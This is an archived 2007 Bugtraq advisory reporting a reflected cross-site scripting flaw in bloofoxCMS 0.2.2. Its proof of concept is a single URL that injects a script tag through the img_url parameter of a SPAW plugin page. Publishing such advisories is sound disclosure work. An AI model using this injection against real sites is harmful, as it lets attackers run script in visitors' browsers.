| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | bloofoxCMS 0.2.2 Cross Site Scripting |
| From: | the_3dit0r@yahoo.com |
| Date: | 14 Apr 2007 06:30:11 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Research TM # Tilte: bloofoxCMS 0.2.2 Cross Site Scripting # Author..................: [the_Edit0r] # HomePage................: [Www.XmorS-SEcurity.coM] # Location ...............: [Iran] # Software ...............: [bloofoxCMS] # Site Script ............: [www.bloofox.com] # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ] ------------------------------- proof Of Concept --------------------------- www.example.com/[path]/plugins/spaw/img_popup.php?img_url=<script>alert(/the_Edit0r/);</script> ---------------------------------------------------------------------------- # Contact me : the_3dit0r[at]Yahoo[dot]coM # [XmorS-SEcurity.coM] |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Back-End CMS Database Tables v0.4.7 Cross Site Scripting, the_3dit0r |
|---|---|
| Next by Date: | MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities, the_3dit0r |
| Previous by Thread: | Back-End CMS Database Tables v0.4.7 Cross Site Scripting, the_3dit0r |
| Next by Thread: | MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities, the_3dit0r |
| Indexes: | [Date] [Thread] [Top] [All Lists] |